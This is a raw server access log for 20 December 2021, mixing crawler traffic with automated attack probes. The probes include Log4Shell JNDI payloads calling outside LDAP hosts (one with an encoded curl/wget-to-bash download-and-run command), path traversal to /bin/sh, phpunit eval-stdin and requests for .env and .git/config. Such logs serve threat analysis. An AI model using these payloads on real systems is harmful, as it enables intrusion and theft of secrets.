92.118.160.41 - - [20/Dec/2021:01:14:55 +0100] "GET / HTTP/1.1" 301 394 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 195.54.160.149 - - [20/Dec/2021:01:44:01 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 128.1.248.26 - - [20/Dec/2021:02:27:39 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 128.1.248.26 - - [20/Dec/2021:02:27:46 +0100] "GET /webfig/ HTTP/1.1" 301 307 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 170.210.45.163 - - [20/Dec/2021:02:44:46 +0100] "GET /${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 301 428 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 170.210.45.163 - - [20/Dec/2021:02:44:47 +0100] "GET / HTTP/1.1" 301 383 "-" "${jndi:ldap://5.101.118.127:1389/Exploit}" 170.210.45.163 - - [20/Dec/2021:02:44:47 +0100] "GET /?v=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 301 431 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 170.210.45.163 - - [20/Dec/2021:02:44:48 +0100] "GET /?id=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 301 432 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 170.210.45.163 - - [20/Dec/2021:02:44:49 +0100] "GET /?page=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 301 434 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 170.210.45.163 - - [20/Dec/2021:02:44:50 +0100] "GET /?s=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 301 431 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 170.210.45.163 - - [20/Dec/2021:02:44:51 +0100] "POST /login HTTP/1.1" 301 388 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 170.210.45.163 - - [20/Dec/2021:02:44:51 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 170.210.45.163 - - [20/Dec/2021:02:44:52 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 170.210.45.163 - - [20/Dec/2021:02:44:53 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 170.210.45.163 - - [20/Dec/2021:02:44:54 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 195.54.160.149 - - [20/Dec/2021:03:23:24 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 92.118.160.57 - - [20/Dec/2021:03:36:49 +0100] "GET / HTTP/1.1" 301 391 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 195.54.160.149 - - [20/Dec/2021:04:54:19 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 131.220.6.152 - - [20/Dec/2021:04:57:16 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 192.35.168.80 - - [20/Dec/2021:05:46:52 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 195.54.160.149 - - [20/Dec/2021:06:05:27 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 301 318 "https://86.59.113.102:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.149 - - [20/Dec/2021:06:11:52 +0100] "-" 408 - "-" "-" 89.248.165.52 - - [20/Dec/2021:06:21:38 +0100] "-" 408 - "-" "-" 45.72.48.130 - - [20/Dec/2021:06:37:02 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 193.106.29.210 - - [20/Dec/2021:06:38:54 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" 109.237.103.123 - - [20/Dec/2021:07:02:58 +0100] "GET /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.103.123 - - [20/Dec/2021:07:02:59 +0100] "POST /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 192.241.214.81 - - [20/Dec/2021:07:11:06 +0100] "GET /actuator/health HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 40.77.167.42 - - [20/Dec/2021:07:12:46 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 183.136.225.9 - - [20/Dec/2021:07:17:54 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 183.136.225.9 - - [20/Dec/2021:07:18:06 +0100] "GET /robots.txt HTTP/1.1" 301 308 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 128.14.134.170 - - [20/Dec/2021:07:47:15 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 195.54.160.149 - - [20/Dec/2021:08:22:47 +0100] "GET /_ignition/execute-solution HTTP/1.1" 301 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.149 - - [20/Dec/2021:08:33:25 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.241.212.171 - - [20/Dec/2021:09:00:13 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.213.182 - - [20/Dec/2021:09:09:43 +0100] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 301 335 "-" "Mozilla/5.0 zgrab/0.x" 92.118.160.1 - - [20/Dec/2021:09:13:43 +0100] "GET / HTTP/1.1" 301 393 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 195.54.160.149 - - [20/Dec/2021:10:20:42 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 89.248.173.131 - - [20/Dec/2021:10:30:37 +0100] "GET /remote/login?lang=en HTTP/1.1" 301 315 "-" "python-requests/2.21.0" 23.251.102.74 - - [20/Dec/2021:10:57:52 +0100] "GET /solr/ HTTP/1.1" 301 304 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 89.248.165.52 - - [20/Dec/2021:11:11:06 +0100] "-" 408 - "-" "-" 195.54.160.149 - - [20/Dec/2021:11:47:42 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==} HTTP/1.1" 301 435 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==}" 198.199.95.200 - - [20/Dec/2021:12:17:12 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.213.113 - - [20/Dec/2021:12:20:13 +0100] "GET /owa/auth/logon.aspx HTTP/1.1" 301 314 "-" "Mozilla/5.0 zgrab/0.x" 192.241.213.120 - - [20/Dec/2021:12:20:56 +0100] "GET /owa/auth/x.js HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 185.220.100.241 - - [20/Dec/2021:12:22:45 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 209.141.58.146 - - [20/Dec/2021:12:22:50 +0100] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 130.211.54.158 - - [20/Dec/2021:12:42:52 +0100] "GET / HTTP/1.1" 301 301 "-" "python-requests/2.26.0" 161.35.246.138 - - [20/Dec/2021:12:46:55 +0100] "GET /noshop HTTP/1.1" 301 397 "https://renault.activities.at/noshop" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1" 150.143.163.115 - - [20/Dec/2021:12:46:55 +0100] "GET /noshop HTTP/1.1" 301 397 "https://renault.activities.at/noshop" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 212.102.57.141 - - [20/Dec/2021:12:46:56 +0100] "GET /noshop HTTP/1.1" 301 397 "https://renault.activities.at/noshop" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 161.35.246.138 - - [20/Dec/2021:12:46:56 +0100] "GET /login?required=true HTTP/1.1" 301 410 "https://renault.activities.at/login?required=true" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Mobile/15E148 Safari/604.1" 212.102.57.141 - - [20/Dec/2021:12:46:56 +0100] "GET /login?required=true HTTP/1.1" 301 410 "https://renault.activities.at/login?required=true" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" 150.143.163.115 - - [20/Dec/2021:12:46:56 +0100] "GET /login?required=true HTTP/1.1" 301 410 "https://renault.activities.at/login?required=true" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" 13.246.24.21 - - [20/Dec/2021:12:46:57 +0100] "GET /login?required=true HTTP/1.1" 301 410 "https://renault.activities.at/login?required=true" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Mobile/15E148 Safari/604.1" 13.246.24.21 - - [20/Dec/2021:12:47:00 +0100] "GET /noshop HTTP/1.1" 301 397 "https://renault.activities.at/noshop" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Mobile/15E148 Safari/604.1" 172.255.125.170 - - [20/Dec/2021:12:47:03 +0100] "GET /login?required=true HTTP/1.1" 301 410 "https://renault.activities.at/login?required=true" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_0_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1" 192.241.209.153 - - [20/Dec/2021:14:25:37 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 109.237.103.38 - - [20/Dec/2021:16:22:09 +0100] "GET /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.103.38 - - [20/Dec/2021:16:22:10 +0100] "POST /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 162.221.192.26 - - [20/Dec/2021:17:42:10 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 128.14.134.134 - - [20/Dec/2021:19:15:07 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 139.162.145.250 - - [20/Dec/2021:19:17:51 +0100] "GET /bag2 HTTP/1.1" 301 304 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" 109.237.103.118 - - [20/Dec/2021:20:08:39 +0100] "GET /.git/config HTTP/1.1" 301 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.103.118 - - [20/Dec/2021:20:08:40 +0100] "POST /.git/config HTTP/1.1" 301 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 27.124.5.126 - - [20/Dec/2021:20:55:34 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 27.124.5.126 - - [20/Dec/2021:20:55:38 +0100] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Go-http-client/1.1" 27.124.5.126 - - [20/Dec/2021:20:55:51 +0100] "GET /robots.txt HTTP/1.1" 301 308 "-" "Go-http-client/1.1" 27.124.5.126 - - [20/Dec/2021:20:56:05 +0100] "GET /sitemap.xml HTTP/1.1" 301 309 "-" "Go-http-client/1.1" 207.46.13.233 - - [20/Dec/2021:21:47:14 +0100] "GET /robots.txt HTTP/1.1" 301 311 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 207.46.13.233 - - [20/Dec/2021:21:47:16 +0100] "GET /robots.txt HTTP/1.1" 301 311 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 40.77.167.42 - - [20/Dec/2021:21:47:18 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 34.96.130.1 - - [20/Dec/2021:22:00:41 +0100] "GET / HTTP/1.1" 301 391 "-" "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" 23.90.160.114 - - [20/Dec/2021:22:25:11 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 195.54.160.149 - - [20/Dec/2021:22:34:51 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 185.180.143.75 - - [20/Dec/2021:23:22:37 +0100] "GET / HTTP/1.1" 301 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" 128.14.134.134 - - [20/Dec/2021:23:45:06 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"